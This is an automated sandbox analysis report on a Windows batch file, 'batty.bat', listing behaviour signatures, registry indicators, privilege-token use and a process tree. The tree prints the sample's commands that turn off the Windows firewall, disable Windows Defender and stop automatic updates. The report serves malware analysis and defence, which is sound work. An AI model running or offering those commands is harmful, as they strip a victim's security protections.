a51d5ba8a45986784cf36b41570e3071975bb22d7b50d7aec05742c68ec0ad55

Analysis

max time kernel
120s
max time network
122s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
29/09/2024, 07:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batty.bat
Size

4KB
MD5

0ed6d92eb6002975cab4b141fa8e48f9
SHA1

3d81c6350ef10be62a7c6b175af44fa363d81feb
SHA256

a51d5ba8a45986784cf36b41570e3071975bb22d7b50d7aec05742c68ec0ad55
SHA512

0beea6db5a1c00c96e8cad70661e23647a9ba71f681d865b3c103ad86e2af1fa80acbbe1d7554b7c6034de7659b9853943a43d6b70f44e37aafbbab70baa1373
SSDEEP

48:37l9BNXcf6iG2FK+8OEW9+HeEdUm/E2n23WwkFEeJE/sPEijE1Ms9Xc/fDKye9+j:37jEf8+8HFU22mZXMGEny/NKCDjT

Score

8^/10

discovery evasion exploit persistence privilege_escalation spyware stealer

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5072	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3192	icacls.exe
4020	takeown.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4020	takeown.exe
3192	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	StartMenuExperienceHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	StartMenuExperienceHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	StartMenuExperienceHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	StartMenuExperienceHost.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com\Total = "0"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com\ = "0"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "84"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "6320"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "6320"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200"	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\History\CacheLimit = "1"	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "23"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\MicrosoftEdge\ServiceWorkers	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\ = "0"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "132"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "6320"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "11643"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "15047"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheLimit = "1"	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "0"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "56"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CacheVersion = "1"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com\NumberOfSubdomains = "0"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheVersion = "1"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\NumberOfSubdomains = "1"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\MicrosoftEdge\ServiceWorkers\HasActiveRegistrations = "1"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "0"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\MicrosoftEdge	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "56"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Cookies	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\History	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheLimit = "1"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\NumberOfSubdomains = "0"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheVersion = "1"	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com\ = "0"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "23"	SearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-131918955-2378418313-883382443-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "11643"	SearchHost.exe

Runs net.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1784	OpenWith.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
668	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe
Token: SeTakeOwnershipPrivilege	4020	takeown.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1032	SearchHost.exe
3736	StartMenuExperienceHost.exe
1784	OpenWith.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 2556	1816	cmd.exe	79
PID 1816 wrote to memory of 2556	1816	cmd.exe	79
PID 2556 wrote to memory of 3416	2556	cmd.exe	81
PID 2556 wrote to memory of 3416	2556	cmd.exe	81
PID 3416 wrote to memory of 4520	3416	net.exe	82
PID 3416 wrote to memory of 4520	3416	net.exe	82
PID 2556 wrote to memory of 5072	2556	cmd.exe	83
PID 2556 wrote to memory of 5072	2556	cmd.exe	83
PID 2556 wrote to memory of 3156	2556	cmd.exe	84
PID 2556 wrote to memory of 3156	2556	cmd.exe	84
PID 2556 wrote to memory of 2264	2556	cmd.exe	85
PID 2556 wrote to memory of 2264	2556	cmd.exe	85
PID 2556 wrote to memory of 2336	2556	cmd.exe	86
PID 2556 wrote to memory of 2336	2556	cmd.exe	86
PID 2556 wrote to memory of 3908	2556	cmd.exe	87
PID 2556 wrote to memory of 3908	2556	cmd.exe	87
PID 2556 wrote to memory of 4196	2556	cmd.exe	88
PID 2556 wrote to memory of 4196	2556	cmd.exe	88
PID 2556 wrote to memory of 4076	2556	cmd.exe	89
PID 2556 wrote to memory of 4076	2556	cmd.exe	89
PID 2556 wrote to memory of 4720	2556	cmd.exe	90
PID 2556 wrote to memory of 4720	2556	cmd.exe	90
PID 2556 wrote to memory of 5108	2556	cmd.exe	91
PID 2556 wrote to memory of 5108	2556	cmd.exe	91
PID 2556 wrote to memory of 2384	2556	cmd.exe	92
PID 2556 wrote to memory of 2384	2556	cmd.exe	92
PID 2556 wrote to memory of 4776	2556	cmd.exe	93
PID 2556 wrote to memory of 4776	2556	cmd.exe	93
PID 2556 wrote to memory of 236	2556	cmd.exe	94
PID 2556 wrote to memory of 236	2556	cmd.exe	94
PID 2556 wrote to memory of 1804	2556	cmd.exe	95
PID 2556 wrote to memory of 1804	2556	cmd.exe	95
PID 2556 wrote to memory of 1576	2556	cmd.exe	96
PID 2556 wrote to memory of 1576	2556	cmd.exe	96
PID 2556 wrote to memory of 1544	2556	cmd.exe	97
PID 2556 wrote to memory of 1544	2556	cmd.exe	97
PID 2556 wrote to memory of 3612	2556	cmd.exe	98
PID 2556 wrote to memory of 3612	2556	cmd.exe	98
PID 2556 wrote to memory of 4020	2556	cmd.exe	99
PID 2556 wrote to memory of 4020	2556	cmd.exe	99
PID 2556 wrote to memory of 3192	2556	cmd.exe	100
PID 2556 wrote to memory of 3192	2556	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\batty.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\batty.bat hide
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:4520
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5072
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3156
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
